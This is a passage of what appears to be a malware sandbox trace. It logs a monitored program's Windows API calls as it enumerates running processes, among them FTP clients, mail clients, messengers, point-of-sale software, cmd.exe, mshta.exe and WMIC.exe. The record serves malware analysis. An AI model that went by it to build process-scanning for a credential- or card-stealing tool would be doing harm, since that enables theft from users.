th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0099.189] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0099.190] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x734, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0099.224] Process32Next (in: 
hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0099.226] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0099.227] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0099.228] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0099.228] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0099.229] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0099.230] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0099.231] Process32Next 
(in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0099.232] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0099.233] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0099.234] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0099.235] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0099.236] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0099.251] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0099.252] Process32Next (in: 
hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0099.255] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0099.256] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x904, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0099.257] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0099.258] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0099.260] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0099.264] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0099.266] Process32Next (in: 
hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0099.279] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0099.280] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0099.281] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0099.282] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x994, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0099.282] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0099.283] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0099.286] 
Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0099.287] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0099.288] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0099.289] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0099.290] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="kay.exe")) returned 1 [0099.290] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="autos_pulse_angry.exe")) returned 1 [0099.291] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="surelycakemechanisms.exe")) returned 1 
[0099.292] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="renometric.exe")) returned 1 [0099.293] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0099.294] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0099.294] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0099.295] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x620, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x7c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="osk.exe")) returned 1 [0099.296] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="mshta.exe")) returned 1 [0099.297] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0099.297] 
Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0099.298] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa4c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 1 [0099.299] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0099.302] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.302] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0099.303] GlobalLock (hMem=0x45000c) returned 0x588f38 [0099.303] GlobalHandle (pMem=0x588f38) returned 0x45000c [0099.303] GlobalUnlock (hMem=0x45000c) returned 0 [0099.303] GlobalLock (hMem=0x45000c) returned 0x588f38 [0099.303] GlobalLock (hMem=0x450004) returned 0x56f100 [0099.303] GlobalHandle (pMem=0x56f100) returned 0x450004 [0099.303] GlobalUnlock (hMem=0x450004) returned 0 [0099.303] GlobalReAlloc (hMem=0x450004, dwBytes=0x10, uFlags=0x2) returned 0x450004 [0099.304] GlobalLock (hMem=0x450004) returned 0x56f100 [0099.304] GlobalHandle (pMem=0x588f38) returned 0x45000c [0099.304] 
GlobalUnlock (hMem=0x45000c) returned 0 [0099.304] GlobalHandle (pMem=0x56f100) returned 0x450004 [0099.304] GlobalUnlock (hMem=0x450004) returned 0 [0099.304] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x184 [0099.308] Process32First (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.309] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0099.309] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0099.310] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0099.311] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0099.311] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0099.312] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: 
lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0099.312] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0099.313] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0099.314] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0099.314] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.318] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.319] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.319] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: 
lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.320] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.321] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0099.321] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.322] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.323] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0099.323] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0099.324] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: 
lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0099.324] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.325] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0099.326] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0099.326] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="avi_attach_midnight.exe")) returned 1 [0099.327] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="packs_foundation_penn.exe")) returned 1 [0099.328] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="similar-kenya-hurt.exe")) returned 1 [0099.328] Process32Next (in: 
hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="running.exe")) returned 1 [0099.329] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x76c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ordinance jelsoft dies.exe")) returned 1 [0099.329] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="introducing_attraction_ranks.exe")) returned 1 [0099.330] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="include-assuming-employers.exe")) returned 1 [0099.383] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operateleetechnologies.exe")) returned 1 [0099.384] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, 